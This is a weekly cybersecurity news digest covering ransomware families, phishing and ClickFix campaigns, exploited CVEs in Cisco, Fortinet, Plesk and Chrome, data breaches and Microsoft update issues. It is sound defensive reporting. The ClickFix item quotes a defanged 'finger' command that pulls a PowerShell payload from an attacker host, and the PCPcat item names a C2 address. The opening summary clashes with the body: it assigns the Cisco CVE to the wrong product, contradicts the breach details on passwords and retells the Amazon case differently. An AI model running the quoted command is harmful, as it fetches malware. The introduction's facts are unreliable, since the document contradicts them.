In a week that revealed the flaws in digital trust, cybersecurity headlines were filled with high-profile breaches, zero-day exploits, and bold nation-state espionage.
Attackers claimed to have swiped usernames, emails, and encrypted passwords from over 1.2 million accounts, underscoring the persistent risks of adult platforms as lucrative targets for credential stuffing and phishing campaigns. As investigators scramble, this incident reignites debates on third-party risk management and the adequacy of legacy encryption in high-traffic sites.
Meanwhile, Cisco sounded alarms over a critical zero-day vulnerability (CVE-2025-20393) in its IOS XE software, actively exploited in the wild by APT actors. Dubbed “Storm-1252,” the flaw allows unauthenticated remote code execution on enterprise routers, potentially compromising global networks.
Cisco’s emergency patches arrived just in time, but early reports indicate infections across North America and Europe. Security teams worldwide are urged to prioritize scanning and mitigation, as this flaw highlights the fragility of network perimeters amid rising state-sponsored intrusions.
Adding geopolitical intrigue, Amazon unmasked a North Korean IT worker embedded deep within its cloud infrastructure. Posing as a U.S.-based freelancer via platforms like Upwork, the operative linked to the notorious Lazarus Group attempted to siphon sensitive code and credentials.
Amazon’s behavioral analytics and employee tips thwarted the scheme, leading to swift termination and FBI notification. This bust echoes ongoing DPRK cyber operations funding regimes through corporate infiltration, prompting calls for stricter vetting in remote hiring.
Beyond these blockbusters, our digest covers Oracle’s critical WebLogic patches, a surge in LockBit ransomware variants targeting supply chains, and Google’s Chrome emergency update for a sandbox escape zero-day. We analyze exploitation trends, CVSS breakdowns, and mitigation strategies to arm you against tomorrow’s threats.
Cyber Threats
Gentlemen Ransomware Targets Enterprise Networks
Gentlemen ransomware, first spotted in August 2025, is rapidly becoming one of the most active emerging ransomware families, focusing on medium and large enterprises across at least 17 countries and sectors such as healthcare, manufacturing, and insurance. Operating a double-extortion model, the group exfiltrates sensitive data before encrypting it, leveraging Go-based cross-platform payloads, GPO abuse, and BYOVD techniques to disable defenses and spread laterally. The encryptor requires a valid –password argument to run and uses X25519 for key exchange with XChaCha20 file encryption, selectively encrypting file segments for speed while dropping README-GENTLEMEN.txt ransom notes in affected directories.
Read more: https://cybersecuritynews.com/new-gentlemen-ransomware-breaching-corporate-networks/
Storm-0249: From Mass Phishing to Stealth IAB
Storm-0249 has evolved from a noisy mass-phishing actor into a stealthy initial access broker that sells ransomware-ready access, aligning with broader trends in the cybercrime-as-a-service ecosystem. The group now abuses trusted EDR binaries such as SentinelOne’s SentinelAgentWorker.exe for DLL sideloading, using signed executables to load malicious libraries and maintain persistence under whitelisted, high-trust processes. This shift, often initiated via ClickFix-powered social engineering and malicious MSI packages, allows Storm-0249 to perform reconnaissance, bind encryption to machine identifiers, and evade command-line-based detections.
Read more: https://cybersecuritynews.com/storm-0249-abusing-edr-process/
ClickFix Campaign Abuses finger.exe and Fake CAPTCHAs
A new social engineering technique called ClickFix weaponizes the legacy Windows finger.exe tool and fake CAPTCHA pages to deliver multi-stage malware. Users are tricked into running a finger command (for example, finger gcaptcha@captchaver[.]top) that retrieves a PowerShell command from a remote server, which then executes Base64-encoded payloads to establish a foothold. Campaigns like KongTuke and SmartApeSG leverage TCP port 79 traffic that many environments fail to monitor or block, turning a long-forgotten protocol into an effective initial access vector.
Read more: https://cybersecuritynews.com/new-clickfix-attack-exploits-finger-exe-tool/
PCPcat React2Shell Exploitation Hits 59,000+ Next.js Servers
The PCPcat malware campaign has compromised more than 59,000 servers in under 48 hours by exploiting critical unauthenticated RCE vulnerabilities in Next.js and React (CVE-2025-29927 and CVE-2025-66478). Attacks use prototype pollution and command injection via specially crafted JSON payloads to hijack the Node.js child process execution chain, then exfiltrate environment files, cloud keys, SSH credentials, and histories before deploying GOST and FRP for persistent tunneling infrastructure. PCPcat’s C2, centered around 67.217.57.240 using ports 666, 888, and 5656, coordinates high-frequency scanning batches and installs redundant systemd services to keep compromised servers active in the botnet.
Read more: https://cybersecuritynews.com/new-pcpcat-exploiting-react2shell-vulnerability/
Weaponized SVGs, Office Docs, and Multi-Stage Loaders
Researchers have detailed a sophisticated phishing wave targeting manufacturing and government entities in Italy, Finland, and Saudi Arabia using weaponized Office documents, malicious SVGs, and ZIP/LNK chains to deliver a shared commodity loader. The multi-stage pipeline relies on obfuscated JavaScript, WMI-launched PowerShell, PNG-based steganography for .NET assemblies, trojanized TaskScheduler libraries, and process hollowing into RegAsm.exe, ultimately dropping stealers and RATs such as PureLog, Katz Stealer, DC Rat, Async Rat, and Remcos. Defensive guidance emphasizes disabling the legacy Equation Editor (CVE-2017-11882), tightening email filtering, scrutinizing image attachments, and monitoring suspicious PowerShell execution patterns.
Read more: https://cybersecuritynews.com/hackers-weaponize-svg-files-and-office-documents/
BlueDelta Targets Ukrainian UKR.NET Users
Russian state-backed group BlueDelta (APT28/Fancy Bear/Forest Blizzard) is running a credential-harvesting campaign against users of the popular Ukrainian webmail and news service UKR.NET. Attackers send PDFs that link to fake login portals hosted on services like Mocky and DNS EXIT, then chain link shorteners, ngrok/Serveo tunnels, and multi-layer infrastructure to steal usernames, passwords, 2FA codes, and IP addresses while masking the true C2 locations. Updated JavaScript even bypasses ngrok’s browser warnings by injecting the ngrok-skip-browser-warning header, supporting at least 42 distinct credential-harvesting chains observed over the campaign period.
Read more: https://cybersecuritynews.com/bluedelta-hackers-attacking-users/
Solar Panel Systems at Risk of Remote Manipulation
Recent research shows that Internet-connected solar and energy management systems can be remotely manipulated, enabling attackers to disrupt power generation, alter reported metrics, or leverage access for lateral movement into operational environments. Misconfigurations, default credentials, and exposed management interfaces create an attack surface where adversaries could potentially coordinate large-scale grid-impacting actions or monetize control through extortion. Operators are urged to harden remote access, segment OT from IT networks, and enforce strong authentication on all cloud and web interfaces tied to power infrastructure.
Read more: https://cybersecuritynews.com/hackers-can-manipulate-internet-based-solar-panel-systems/
Qilin–Allied Operations and RaaS Ecosystem Shifts
New research into the Qilin ransomware ecosystem highlights an expanding alliance structure that integrates access brokers, infrastructure providers, and data-leak facilitators around the core RaaS operation. These alliances streamline end-to-end attack workflows—from initial compromise and privilege escalation to data theft, extortion site hosting, and negotiation support—reducing barriers for less skilled affiliates while increasing campaign volume. Organizations are advised to focus on upstream controls such as brokered access detection, monitoring of emerging leak domains, and tighter visibility into cross-actor infrastructure reuse.
Read more: https://cybersecuritynews.com/new-research-uncovers-the-alliance-between-qilin/
Vulnerability
CISA Flags Legacy Sierra Wireless Routers
CISA added a legacy Sierra Wireless AirLink ALEOS vulnerability (CVE-2018-4063) to its Known Exploited Vulnerabilities catalog after evidence of active exploitation. The flaw is an unrestricted file upload issue in the web interface that allows authenticated attackers (often via default or weak credentials) to upload malicious files and achieve remote code execution on the router, enabling persistent footholds and lateral movement into internal networks. Because impacted hardware is End-of-Life with no security patches, CISA urges federal agencies and enterprises to fully decommission and remove these devices rather than attempting to harden them in place.
Read more: https://cybersecuritynews.com/cisa-adds-sierra-router-vulnerability/
Critical Plesk Bug Gives Users Root Access
A severe local privilege escalation vulnerability in Plesk for Linux (CVE-2025-66430) allows any authenticated Plesk user with access to the “Password-Protected Directories” feature to escalate to root on affected servers. The issue stems from improper handling of user input, enabling attackers to inject arbitrary data into Apache configuration and execute commands with root privileges, leading to full server takeover, data theft, malware deployment, and lateral movement. Plesk has released fixes and micro-updates for versions 18.0.70 through 18.0.74 (including Onyx), and administrators are urged to apply patches immediately, restrict access to the feature, and monitor logs for suspicious configuration changes.
Read more: https://cybersecuritynews.com/plesk-vulnerability/
NVIDIA Merlin Deserialization Flaws Threaten AI Workloads
Two high-severity deserialization vulnerabilities in NVIDIA’s Merlin framework (CVE-2025-33213 and CVE-2025-33214) impact NVTabular’s Workflow and Transformers4Rec’s Trainer components on Linux. Insecure deserialization (CWE-502) could allow remote attackers with network access and minimal user interaction to execute malicious code, trigger denial-of-service conditions, exfiltrate sensitive data, and tamper with recommendation system pipelines used in large-scale AI deployments. NVIDIA has shipped security updates through the official Merlin and NVTabular repositories, and organizations running Merlin in production should promptly pull the latest versions, review deserialization usage, and limit untrusted data paths into ML workflows.
Read more: https://cybersecuritynews.com/nvidia-merlin-vulnerabilities/
JumpCloud Remote Assist Vulnerability Enables SYSTEM-Level Takeover
A high-severity local privilege escalation bug in JumpCloud Remote Assist for Windows (CVE-2025-34352) allows low-privileged users to gain NT AUTHORITY\SYSTEM privileges or crash endpoints. The agent’s uninstaller, running as SYSTEM, performs file create, write, delete, and execute operations in the user-controlled %TEMP% directory without sufficient validation, enabling race-condition and file-redirect attacks that lead to full endpoint compromise. JumpCloud has fixed the issue in Remote Assist agent version 0.317.0 and later, and organizations should verify all Windows endpoints are updated, audit for privileged operations in user-writable paths, and monitor for abnormal uninstall triggers or DoS attempts.
Read more: https://cybersecuritynews.com/jumpcloud-remote-assist-for-windows-agent-flaw/
FortiGate SSO Flaws Under Active Exploitation
Threat actors are actively exploiting two critical Fortinet authentication bypass vulnerabilities (CVE-2025-59718 and CVE-2025-59719) in FortiGate firewalls and related products’ FortiCloud SSO login. Crafted SAML messages allow unauthenticated attackers to bypass FortiCloud SSO and obtain administrative access to FortiGate, FortiWeb, FortiProxy, and FortiSwitchManager appliances when the feature is enabled, creating a direct path to configuration theft and network compromise. Fortinet has released patches and urges customers to immediately update, temporarily disable FortiCloud SSO where possible, restrict management interfaces to trusted networks, and reset stored credentials and review logs if any indicators of malicious SSO logins are observed.
Read more: https://cybersecuritynews.com/fortigate-devices-sso-vulnerabilities/
ScreenConnect Server Bug Exposes Config Data and Extensions
ConnectWise ScreenConnect server is affected by a critical vulnerability (CVE-2025-14265) that can let attackers expose sensitive configuration data and install untrusted extensions. The flaw, rooted in missing or weak code integrity checks during extension installation (CWE-494), affects ScreenConnect server versions prior to 25.8, though host and guest clients are not impacted. ConnectWise’s 25.8 update reinforces server-side validation and integrity checking for extensions, and on-prem administrators should upgrade immediately, review installed extensions, and assess logs for suspicious extension activity, while cloud-hosted instances have been patched automatically.
Read more: https://cybersecuritynews.com/screenconnect-vulnerability/
Windows Admin Center LPE via Writable ProgramData Paths
A newly disclosed local privilege escalation vulnerability in Windows Admin Center (CVE-2025-64669) impacts versions up to 2.4.2.1 and environments running WAC 2411 and earlier. Insecure permissions on directories such as C:\ProgramData\WindowsAdminCenter and C:\ProgramData\WindowsAdminCenterUpdater—writable by standard users but used by elevated services—allow attackers to hijack the uninstall and updater flows, drop malicious DLLs, and have them loaded as SYSTEM. Microsoft rated the issue as Important and delivered fixes via the December Patch Tuesday cycle, and defenders should update WAC gateways promptly, validate directory ACLs, and test exposure using vendor-provided validation scenarios to confirm mitigations.
Read more: https://cybersecuritynews.com/windows-admin-center-vulnerability/
Chrome December Security Update Fixes Critical RCE Bugs
Google released Chrome version 143.0.7499.146/.147 for Windows and Mac, and 143.0.7499.146 for Linux, addressing critical vulnerabilities that could lead to remote code execution. The update includes at least two high-severity fixes, including CVE-2025-14765, a use-after-free in WebGPU that exposes users to drive-by exploitation via malicious web content. Enterprises should accelerate browser patch rollouts, enforce automatic updates, and consider tightening policies around WebGPU and high-risk APIs while monitoring for exploitation of Chrome zero-days that continue to be highly attractive to advanced threat actors.
Read more: https://cybersecuritynews.com/chrome-security-update-dec/
Cisco AsyncOS Zero-Day Exploited with AquaShell Backdoor
Cisco is tracking active exploitation of an unpatched zero-day vulnerability (CVE-2025-20393) in AsyncOS powering Cisco Secure Email Gateway and Secure Email and Web Manager appliances. Attackers exploit weak input validation to execute system-level commands remotely and deploy “AquaShell,” a Python-based backdoor embedded into AsyncOS web components that listens for unauthenticated HTTP POST requests and executes encoded payloads. With no official patch yet, organizations must urgently apply Cisco’s hardening guidance, including configuration changes, network segmentation of email security appliances, strict access controls, and use of detection tooling to identify AquaShell indicators of compromise.
Read more: https://cybersecuritynews.com/cisco-asyncos-0-day-vulnerability/
Apache Commons Text RCE via Unsafe Interpolation
A critical remote code execution vulnerability in Apache Commons Text (CVE-2025-46295) affects versions prior to 1.10.0 and arises from unsafe text interpolation features. When applications pass untrusted user input through Commons Text’s interpolation mechanism, attackers can craft payloads and other lookups to execute arbitrary code or trigger malicious external interactions, impacting a wide range of Java applications that rely on the library for string processing. Organizations should inventory applications using Commons Text, upgrade to at least version 1.10.0 (or 1.14.0 as recommended by some vendors), implement robust input validation for interpolated data, and add dependency-scanning controls to catch vulnerable versions early in the lifecycle.
Read more: https://cybersecuritynews.com/apache-commons-text-vulnerability/
Cyberattack
Android banking Trojan “Frogblight”
A new Android banking Trojan dubbed Frogblight is targeting Turkish users by masquerading as official government and popular apps (including court portals and Chrome) to steal banking credentials and personal data. Victims are lured via SMS about fake court cases that redirect to cloned government sites, where they download the malicious APK.
Once installed, Frogblight abuses extensive permissions (SMS read/write, storage, device info) and shows real government pages in an embedded WebView to appear legitimate. The malware injects JavaScript into the WebView to intercept user input, forces banking login flows, communicates with C2 via Retrofit/REST and later WebSockets, and persists with multiple Android services, while evading analysis via emulator checks and geofencing.
Read more: https://cybersecuritynews.com/new-android-malware-frogblight-mimics-as-official-government-websites/
GhostPairing: WhatsApp device‑link hijacking
The GhostPairing attack is an account‑takeover campaign that abuses WhatsApp’s legitimate device linking flow, requiring no password theft or software exploit. Attackers send lures from compromised or spoofed contacts with a “photo” link that leads to a fake Facebook‑themed verification page.
When victims enter their phone number, the backend requests a legitimate WhatsApp pairing code and displays it with instructions to enter it in the real app, tricking users into approving the attacker’s browser as a linked device. This grants persistent, invisible access to all chats and media, turning compromised accounts into propagation bots, and can only be mitigated by reviewing linked devices, distrusting unsolicited pairing requests, and enabling WhatsApp’s Two‑Step Verification.
Read more: https://cybersecuritynews.com/new-ghostpairing-attack-let-attackers-gain-full-access/
Russian GRU hackers on the network edge
A Russian state‑sponsored group linked to the GRU’s Sandworm/APT44 cluster is running a years‑long campaign against Western critical infrastructure by abusing misconfigured network edge devices rather than focusing on zero‑day exploits. The operators target exposed management interfaces on customer‑managed appliances hosted on cloud platforms like AWS EC2, then maintain persistent interactive access.
Once they control an edge device, they capture passing authentication traffic to harvest credentials for cloud consoles, collaboration tools, and source repositories, later replaying them against victim services across the energy, telecom, and managed security sectors. The campaign underscores that weak configuration and monitoring of routers, VPNs, and virtual appliances now rival patchable vulnerabilities as prime initial‑access vectors.
Read more: https://cybersecuritynews.com/russian-hackers-attacking-network-edge-devices/
BlindEagle is abusing internal email trust
The BlindEagle threat actor has launched a fresh cyber‑espionage wave against Colombian government entities, this time by compromising an internal email account to bypass SPF, DKIM, and DMARC controls. Using this foothold, attackers sent phishing messages that looked like legitimate internal notifications about a fabricated labor lawsuit, weaponized with SVG attachments.
Interaction with the SVG leads victims through a complex, multi‑stage infection chain that uses heavy obfuscation and legitimate web services to hide payload delivery and C2 communication. By pivoting from external to internal trust abuse, BlindEagle significantly increases deliverability and user click‑through rates, challenging organizations that rely solely on perimeter email controls.
Read more: https://cybersecuritynews.com/blindeagle-hackers-attacking-organization/
Chinese ShadowPad IIS listener C2 mesh
A Chinese state‑aligned group (tracked as Earth Alux/REF7707) is deploying a custom ShadowPad IIS Listener module to convert compromised web servers into a distributed relay network. The operation begins with exploitation of ASP.NET ViewState deserialization and SharePoint flaws (often via leaked machine keys or unpatched endpoints) to gain remote code execution and full system compromise.
The custom IIS module registers dynamic URL listeners via the HttpAddUrl API, decrypts specially crafted HTTP requests, and silently handles C2 traffic while passing all other requests to the normal IIS worker, blending into legitimate web traffic. This design turns victim infrastructure into resilient C2 nodes, prioritizing long‑term stealth and operational redundancy over noisy implants or standalone C2 servers.
Read more: https://cybersecuritynews.com/chinese-hackers-using-custom-shadowpad-iis-listener-module/
Data Breach
Jaguar Land Rover Employee Data Breach
Jaguar Land Rover confirmed that an August cyberattack exposed sensitive data belonging to current and former employees and contractors, including information used for payroll, benefits, and staff schemes that may extend to dependents. While JLR has not disclosed the exact attack vector, the incident crippled UK manufacturing plants for over a month, contributing to losses exceeding $890 million and inflating quarterly losses to £342 million ($442 million).
Regulators such as the UK ICO have been notified, and JLR is contacting affected individuals, offering a dedicated helpline and complimentary credit/identity monitoring services. The company maintains that no customer or vehicle data was impacted, but experts warn that exposed employee PII—likely including names, addresses, salaries, and National Insurance numbers—could fuel identity theft, targeted fraud, and extortion.
Read more: https://cybersecuritynews.com/jaguar-land-rover-employee-data-stolen/
Pornhub Premium Data Exposed via Mixpanel
ShinyHunters claimed responsibility for breaching Mixpanel, exposing a limited set of analytics events linked to Pornhub Premium users rather than Pornhub’s core infrastructure. The compromised data appears to involve legacy session and behavioral analytics events from before Pornhub stopped using Mixpanel in 2021, with no passwords, payment data, or government IDs reported as exposed.
Pornhub has launched an internal investigation, engaged cybersecurity experts, and urged users to watch for phishing, enable MFA, and avoid interacting with unsolicited messages claiming to be from the platform. Security experts note that, if claims of large‑scale exposure of detailed viewing histories prove accurate, the impact could rival or exceed the 2016 Adult Friend Finder incident, especially given the potential for triple extortion and misuse of sensitive data to “poison” AI models.
Read more: https://cybersecuritynews.com/pornhub-breached/
Windows & Linux
MSMQ Patch Breaks IIS Queues (KB5071546)
Microsoft’s December 2025 security update KB5071546 (OS Build 19045.6691) is breaking Message Queuing (MSMQ) functionality for Windows 10 22H2 and Windows Server 2016/2019, especially in high-load clustered environments. Affected systems see MSMQ queues go dormant and IIS sites crash with “Insufficient resources to perform operation” despite adequate RAM and disk.
The disruption stems from tightened NTFS permissions on the MSMQ storage path C:\Windows\System32\MSMQ\storage, which strip write access from non-admin MSMQ users and cause message file creation failures. Until Microsoft ships a fix, admins are advised to avoid deploying KB5071546 on MSMQ-heavy environments or test carefully in staging while monitoring Microsoft’s advisory for updated guidance.
Read more: https://cybersecuritynews.com/message-queuing-functionality-iis-sites/
WSL Update Disrupts Enterprise VPS Access (KB5067036)
The October 28, 2025 non-security update KB5067036 (builds 26200.7019 and 26100.7019 preview) is breaking VPS access for Windows Subsystem for Linux users who rely on enterprise VPNs in mirrored networking mode. Users see “No route to host” errors inside WSL even though connectivity from the Windows host remains intact, disrupting access to corporate VPS resources and remote infrastructure.
The root cause is tied to third-party VPN virtual interfaces failing to respond to ARP requests, affecting clients like Cisco Secure Client (AnyConnect) and OpenVPN in enterprise environments. Microsoft is investigating with no patch ETA yet, and admins are temporarily working around the issue by disabling mirrored networking or switching WSL to bridged networking while testing updates in staging.
Read more: https://cybersecuritynews.com/windows-update-breaks-vps-access/
Global Microsoft Teams Messaging Outage
Microsoft Teams suffered a significant global outage on Friday, causing widespread messaging delays, failed deliveries, and degraded functionality across multiple regions during business hours. Reports surged around 2:30 PM ET (7:30 PM GMT), with users in the US, Europe, Australia, and Asia experiencing severe latency, file-sharing issues, and service instability.
Microsoft acknowledged the incident via its official status channels, directing admins to incident ID TM1200517 in the Microsoft 365 admin center, and indicated telemetry showed signs of recovery while root cause analysis continued. The outage coincided with reported impacts to other Microsoft 365 services such as Outlook and OneDrive in some regions, reinforcing the need for robust continuity plans when core collaboration platforms fail.
Read more: https://cybersecuritynews.com/microsoft-teams-down/
Microsoft 365 Baseline Security Mode Rolls Out
Microsoft has begun rolling out Baseline Security Mode across Microsoft 365 tenants, introducing a centralized dashboard in the M365 Admin Center to apply Microsoft-recommended security baselines to Office, SharePoint, Exchange, Teams, and Entra. Announced at Ignite 2025, this opt-in capability appears under Org Settings → Security & Privacy and is expected to reach most tenants globally by late January 2026, with government clouds following by March 2026.
Baseline Security Mode bundles 18–20 policies into three core areas, including 12 authentication controls that disable legacy protocols like basic auth and EWS while enforcing phishing-resistant MFA for admins via FIDO2 or passkeys. Additional file-protection controls restrict risky behaviors such as opening documents over insecure HTTP/FTP, using ActiveX or DDE, and keep vulnerable tools like Publisher disabled ahead of retirement, all with simulation and reporting options so admins can assess impact before enforcing.
Read more: https://cybersecuritynews.com/microsoft-baseline-security-mode/
Others
CISA & NSA Push UEFI Secure Boot Audits
CISA and NSA have released a new Cybersecurity Information Sheet urging enterprises to verify and actively manage UEFI Secure Boot configurations to defend against modern bootkits like PKFail, BlackLotus (CVE-2023-24932), and BootHole. The guidance stresses that misconfigured keys, leftover test certificates, or disabled Secure Boot modes can let attackers bypass boot-time checks and install stealthy firmware-level malware.
Admins are advised to confirm whether Secure Boot is truly enforcing (for example with Confirm‑SecureBootUEFI on Windows or mokutil on Linux), export and review PK/KEK/DB/DBX variables, and compare them against known-good baselines using NSA tooling. Recommended configurations include vendor PK/KEK, Microsoft 2011/2023 CAs in DB, and a DBX that contains only revocation hashes—not test keys or permissive entries—with remediation via firmware resets, capsule updates, and tighter supply chain checks.
Read more: https://cybersecuritynews.com/cisa-guidance-uefi-secure-boot/
Let’s Encrypt’s “Generation Y” Roots & 45-Day Certs
Let’s Encrypt has announced a new “Generation Y” root hierarchy, along with a multi‑year plan to shorten certificate lifetimes and retire TLS client authentication from its public issuance profiles. The new structure introduces two Root CAs and six Intermediates cross-signed by existing X1 and X2 roots, maintaining broad trust while removing TLS Client Authentication EKU in line with upcoming browser and root program mandates.
Rollout is profile-driven: classic users move to Generation Y by May 13, 2026, while tlsserver and shortlived profiles start using Gen Y sooner and gain access to short‑lived certs with IP address support. Let’s Encrypt plans an opt‑in 45‑day validity for early adopters in 2026, with default lifetimes dropping to 64 days in 2027 and 45 days in 2028 to reduce key compromise risk and better align with CA/Browser Forum Baseline Requirements.
Read more: https://cybersecuritynews.com/lets-encrypt-unveils-new-generation-y-root/
Amazon Nabs North Korean IT Infiltrator via Keystroke Lag
Amazon recently uncovered a North Korean operative posing as a U.S.-based systems administrator for a contractor after security tools flagged a tiny but suspicious delay in keystroke transmissions. Commands that should have traversed the network in under 100 milliseconds were consistently arriving at more than 110 milliseconds, signaling that the laptop—physically in Arizona—was being remotely controlled from overseas.
Further investigation tied the activity to broader DPRK “remote IT worker” schemes that use fake identities, resume patterns, and U.S. proxies (or “laptop farms”) to bypass sanctions and funnel income into weapons programs. Amazon’s CSO disclosed that since April 2024 the company has blocked over 1,800 suspected North Korean job attempts, with such infiltration efforts rising about 27% each quarter, underscoring the need for deeper vetting and telemetry-based location checks beyond simple IP verification.
Read more: https://cybersecuritynews.com/amazon-catches-north-korean-it-worker/
